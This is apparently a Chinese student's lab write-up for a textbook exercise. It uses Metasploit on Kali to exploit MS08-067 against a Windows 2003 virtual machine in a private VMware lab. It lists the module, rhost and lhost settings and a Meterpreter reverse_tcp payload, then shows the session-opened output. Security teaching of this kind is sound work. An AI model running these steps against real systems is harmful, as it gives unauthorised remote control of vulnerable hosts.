教材 P239,16 题
综合实验:使用渗透性测试工具 Metasploit
进行漏洞测试。实验内容如下。
- 安装并配置 Kali(https://www.kali.org)。
- 从 Kali 操作系统的终端初始化和启动 Metasploit 工具。
- 使用 Metasploit 挖掘 MS08-067 等漏洞。
配置靶机 Windows 2003
在 VMWare Workstation 中打开 Windows 2003,使用 ipconfig
命令查看本机网络情况。
data:image/s3,"s3://crabby-images/37c7a/37c7a814dfbe129f106d0292fc456ca319e1353d" alt=""
在 VMWare 登录 kali
安装并按照 kali 官方文档配置 kali:Import
Pre-Made Kali VMware VM | Kali Linux Documentation
data:image/s3,"s3://crabby-images/dee34/dee34c83c69acc3ad753a364f0e6c5ab7d0003da" alt=""
1 2
| sudo apt update && sudo apt -y full-upgrade sudo apt install -y metasploit-framework
|
data:image/s3,"s3://crabby-images/36d76/36d765d134d6ee8582001d8164a6fceec3495830" alt=""
1 2
| sudo systemctl start postgresql msfconsole
|
data:image/s3,"s3://crabby-images/a8f50/a8f50c4369c02551340652dc10fa62bb0e346d4e" alt=""
查找使用 ms08_067 漏洞模块
1 2
| search ms08_067 use exploit/windows/smb/ms08_067_neta
|
data:image/s3,"s3://crabby-images/22bf3/22bf386e2b94a0cffe0dc40fba30f004665e475f" alt=""
查看该模块需要配置的参数
1
| show options # 查看该模块需要配置的参数
|
data:image/s3,"s3://crabby-images/5fcb5/5fcb5f194d3ce467af908c648264dbe02128707a" alt=""
配置攻击参数
1 2 3
| set rhost 192.168.152.132 set payload windows/meterpreter/reverse_tcp set lhost 192.168.152.130
|
data:image/s3,"s3://crabby-images/fffae/fffae7b099d81814396df3f06409fa6af78889b9" alt=""
查看操作系统类型
1 2
| show targets use target 74
|
data:image/s3,"s3://crabby-images/e833c/e833cade0358a4906a1af05e1f131acfe55fa936" alt=""
进入到特殊的
payload-meterpreter
该 payload
在控制靶机之后,能够对靶机执行更多的渗透攻击。如果这一步连接失败,尝试重启靶机。
显示
[*] Meterpreter session 1 opened (192.168.152.130:4444 -> 192.168.152.132:1029) at 2024-12-23 09:33:39 -0500
表示攻击成功,可以通过 Metaspolit 进入靶机。
data:image/s3,"s3://crabby-images/29cbb/29cbb31dc3e18f077e2d76bc6ed38b3c3f8d4acf" alt=""